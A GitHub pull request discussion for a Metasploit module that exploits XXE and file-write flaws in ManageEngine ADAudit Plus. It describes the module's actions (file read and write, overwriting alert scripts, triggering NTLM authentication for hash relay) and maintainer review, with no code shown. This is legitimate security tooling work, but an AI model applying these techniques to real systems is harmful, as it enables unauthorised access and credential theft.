New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Add ManageEngine ADAudit Plus auxiliary module for builds 7060 and prior #17132
Add ManageEngine ADAudit Plus auxiliary module for builds 7060 and prior #17132
Conversation
@ErikWynter Does this need updating to pull in the updates from #17133? Would love to review this and get this landed but think we need some reworking to ensure that we aren't duplicating work or using the incorrect functions. Adding the delayed tag until this is updated to use the updates from #17133 |
@gwillcox-r7 hey yeah I'll need to update the branch to get those updates and then adjust some of the code to utilize the final version of the mixin. Before I do that though, I wanted to ask you about the code reuse between this PR and the manageengine_adaudit_plus_cve_2022_28219 . This PR uses almost the exact same code for the XXE FTP server, so I was wondering if you'd prefer me to move that to a mixin, or if it's okay like this? The mixin option would prevent code reuse but would of course require a lot more work, including changes to the |
For the XXE FTP server code, if you reasonably believe that it could be something that would be generic enough to be used across multiple modules, and we don't have existing code for it already, I'd strongly recommend putting it into a mixin/library to ease future module developer's efforts. If however you think its just the case that these two happened to need this code but its not a generic technique that other exploits might use, then I'd be okay with it being reused so long as we noted this somewhere. |
@gwillcox-r7 thanks, yeah honestly I think this is a relatively isolated case. While the technique on paper could work against various Java apps, it seems exceedingly rare. The reason both modules use the same code is that they exploit the same vulnerability type in the exact same product. So based on what you mention I think for we can just keep it in the module for now. If we start seeing this more often, a library is always still a possibility, but I highly doubt that |
Sounds good to me! |
@ErikWynter any updates on pullng that code in? |
@bwatters-r7 thanks for the reminder, I keep forgetting about this one. I'll try and push the required changes for it this week or the next. |
Hey I didn't forget about this but I haven't been able to find the time. I'll keep trying though |
Was just running through the PR queue to see what's possible to land; Do we want to temporarily close this pull request? Or can this land as an interim PR? 👀 |
@adfoster-r7 sorry for the continued delays on this. I haven't forgotten about this but I had some urgent projects I needed to wrap up first. I'm almost done with that and will get back to this PR after. I can't given an exact date, but I will make sure to push the required changes in December. Would that work? |
I'm going to attic this until you're able to get back around to it. When that time comes just let one of us know and we'd be happy to reopen it for you! |
Thanks for your contribution to Metasploit Framework! We've looked at this pull request, and we agree that it seems like a good addition to Metasploit, but it looks like it is not quite ready to land. We've labeled it What does this generally mean? It could be one or more of several things:
We would love to land this pull request when it's ready. If you have a chance to address all comments, we would be happy to reopen and discuss how to merge this! |
@smcintyre-r7 hey yeah that makes sense. I haven't forgotten about it, but I have no clue when I'll have time again. Thanks! |
About
This change adds an auxiliary module (with docs) that exploits unauthenticated XXE (CVE-2021-42847 and CVE-2022-28219) and arbitrary file write (CVE-2021-42847) vulnerabilities in ManageEngine ADAudit Plus in order to perform a variety of unauthenticated actions including arbitrary file read, arbitrary file write and triggering Net-NTLM authentication.
The following five actions are supported:
READ_FILE_OR_DIR
: Read the contents of a file or directory specified viaFILE_OR_DIR_PATH
.WRITE_FILE
: Write a JSON-compatible (UTF-8) payload to a file specified viaFILE_OR_DIR_PATH
.LIST_ALERT_SCRIPTS
: Locate and list the contents of<install_dir>/alert_scripts/
if this directory exists.OVERWRITE_ALERT_SCRIPT
: Overwrite the contents of an existing PowerShell script in<install_dir>/alert_scripts/
with a payload.TRIGGER_NTLM_AUTH
: Trigger Net-NTLM authentication from the target (for hash capture/relaying via Responder/impacket-ntlmrelayx etc.This module has been successfully tested against ManageEngine ADAudit Plus 7005 running on Windows Server 2012 R2.
Vulnerable Application
WRITE_FILE
andOVERWRITE_ALERT_SCRIPT
actions can be used to target ManageEngine ADAudit Plus builds prior to 7006.READ_FILE_OR_DIR
,LIST_ALERT_SCRIPTS
andTRIGGER_NTLM_AUTH
actions affect builds prior to 7060 if theXXE_VECTOR
option is set toCVE-2022-28219
(default).Writeup and demo videos
I have published a writeup that covers the attacks that this module exploits.
In addition, I have created the following demo videos:
READ_FILE_OR_DIR
actionWRITE_FILE
actionTRIGGER_NTLM_AUTH
actionLIST_ALERT_SCRIPTS
andOVERWRITE_ALERT_SCRIPT
actions.Conditional unauthenticated RCE
It should be noted that under certain non-default circumstances, the
LIST_ALERT_SCRIPTS
andOVERWRITE_ALERT_SCRIPT
actions can be used as part of a broader attempt to achieve unauthenticated RCE on ADAudit Plus builds 7004 and 7005. The requirements for this are detailed in my writeup and video4
(see previous section), shows what the full attack could look like in practice.Overlap with manageengine_adaudit_plus_cve_2022_28219
This module uses quite a lot of code that is currently part of the manageengine_adaudit_plus_cve_2022_28219 exploit module by @rbowes-r7 . This is because aspects of this module cover the same vulnerability (CVE-2022-28219). More specifically, the
READ_FILE_OR_DIR
andLIST_ALERT_SCRIPTS
actions take advantage of the same XXE FTP server used in that module in order to obtain directory listings and file contents. It would probably make sense to move most of the duplicate code to a mixin. I'd be happy to do the heavy lifting for that.Installation Information
Vulnerable versions of ADAudit Plus are available here.
After running the installer, you can launch ADAudit Plus by opening Command Prompt with administrator privileges
and then running:
<install_dir>\bin\run.bat
Scenarios
ManageEngine ADAudit Plus build 7005 running on Windows Server 2012 R2 - READ_FILE_OR_DIR
ManageEngine ADAudit Plus build 7005 running on Windows Server 2012 R2 - WRITE_FILE
ManageEngine ADAudit Plus build 7005 running on Windows Server 2012 R2 - LIST_ALERT_SCRIPTS
OVERWRITE_ALERT_SCRIPT
TRIGGER_NTLM_AUTH